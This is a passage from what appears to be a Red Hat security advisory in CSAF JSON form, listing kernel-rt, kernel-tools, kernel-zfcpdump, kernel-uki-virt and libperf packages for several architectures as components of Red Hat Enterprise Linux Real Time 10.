"name": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
